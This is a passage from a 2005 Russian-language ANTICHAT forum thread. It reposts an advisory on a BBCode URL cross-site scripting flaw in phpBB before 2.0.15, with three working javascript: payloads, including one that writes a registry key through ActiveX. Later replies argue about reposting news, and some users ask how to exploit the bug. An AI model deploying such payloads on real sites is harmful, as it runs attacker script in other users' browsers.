HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу phpBB < 2.0.15, BBCODE URL в phpBB
   
Ответ
Страница 1 из 3 1 2 3 >
 
Опции темы Поиск в этой теме Опции просмотра

phpBB < 2.0.15, BBCODE URL в phpBB
  #1  
Старый 06.06.2005, 22:04
karapuz
Новичок
Регистрация: 06.03.2005
Сообщений: 16
С нами: 11147552

Репутация: 2
По умолчанию phpBB < 2.0.15, BBCODE URL в phpBB
http://www.securitylab.ru/55012.html
http://www.securitylab.ru/55013.html

Межсайтовый скриптинг в при обработке BBCODE URL в phpBB
Программа: phpBB версии до 2.0.15

Опасность: Низкая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

Уязвимость обнаружена при обработке BBCODE URL в сценарии bbcode.php. Удаленный пользователь может с помощью специально сформированного сообщения выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

Цитата:
[urЛ=javascript://%0ASh=alert(%22CouCou%22); window.close();]Alert box with "CouCou"[/urЛ]
Цитата:
[urЛ=javascript://%0ASh=new%20ActiveXObject (%22WScript.shell%22);Sh.regwrite(%22HKCU %5C%5CQQQQQ%5C%5Cqq%22,%22CouCou %22);window.close();]Create registry entry: HKCU\QQQQQ\qq = "CouCou"[/urЛ]
Цитата:
[urЛ=javascript://%0Awindow.opener.document.body. innerHTML=window.opener.document.body.innerHTML. replace(%27Hi%20Paul%27,%27Hi%20P.A.U.L%27); window.close();]Modify opener page: Paul -> P.A.U.L[/urЛ]
URL производителя: www.phpbb.com

Решение: Установите последнюю версию (2.0.15) с сайта производителя.
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось karapuz; 06.06.2005 в 22:07..
 
Ответить с цитированием

  #2  
Старый 06.06.2005, 22:25
Rebz
Флудер
Регистрация: 08.11.2004
Сообщений: 3,395
С нами: 11317286

Репутация: 3876


По умолчанию
Так-с... любить Секлаба!!
Уже в 2-х местах оставил ссылки...

Попрошу больше не писать подобных постов.. Со мной многие согласятся. Нам не нужно тупые копи_пейст новостей секлаба, усёк?
 
Ответить с цитированием

  #3  
Старый 06.06.2005, 22:38
karapuz
Новичок
Регистрация: 06.03.2005
Сообщений: 16
С нами: 11147552

Репутация: 2
Angry
Rebz, я те че каждый день ссылки кидаю ? и оставил то я их по делу!!!
вроде как ты и не модератор(админ, урцтой перец ) что бы права качать.
а запостил я потому что ни кто эту тему не обсуждал еще! имхо phpBB многих интересует.


Rebz не надо быть таким "реальным авторитетом форума, подписывающимся за всех"

p.s. вроде я понятно обьяснил...
 
Ответить с цитированием

  #4  
Старый 06.06.2005, 22:47
Rebz
Флудер
Регистрация: 08.11.2004
Сообщений: 3,395
С нами: 11317286

Репутация: 3876


По умолчанию
вроде бы понятно..
но вижу ты новичок и не и знаешь наших "тёплых" отношений к секлабу.
А про авторитет - это уже не твоё дело =)
 
Ответить с цитированием

  #5  
Старый 06.06.2005, 23:20
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
С нами: 11282726

Репутация: 67
По умолчанию
сейчас опять обрушится серия ударов по phpBB =)
 
Ответить с цитированием

  #6  
Старый 08.06.2005, 11:26
CyberHack
Новичок
Регистрация: 20.05.2005
Сообщений: 16
С нами: 11039008

Репутация: 0
По умолчанию
vo novoe sobitie.davaite sozdaite vidio kak lamanut forum.
pojavilsia novij bag zna4it nobvoe vidio popitajtes sozdat.
ocen bi xotelos posmatret
 
Ответить с цитированием

  #7  
Старый 09.06.2005, 17:42
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
С нами: 11058146

Репутация: 4536


По умолчанию
кто тебе это сделать мешает?
 
Ответить с цитированием

  #8  
Старый 09.06.2005, 19:04
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
С нами: 11042306

Репутация: 2726


По умолчанию
Нунафига с секлаба то
 
Ответить с цитированием

  #9  
Старый 09.06.2005, 22:58
OLIVER
Познающий
Регистрация: 05.02.2005
Сообщений: 73
С нами: 11188499

Репутация: 5
По умолчанию
Kez ну так выбора же практически нет... По иностранным народ лазить не любит, а из русских он один из лутших, это не реклама это ведь реальность, согласись.
Нужно делать конкуренцию!
 
Ответить с цитированием

  #10  
Старый 10.06.2005, 10:11
Xalegi
Участник форума
Регистрация: 24.11.2004
Сообщений: 126
С нами: 11294246

Репутация: 11
По умолчанию
чтоб посраться можно создать другой топик =)
давайте думайте как это использовать =))))))))))))))

ЗЫ: секурлаб и так читаем... реально.. ссылки сюда можно не выкладывать
 
Ответить с цитированием
Ответ
Страница 1 из 3 1 2 3 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.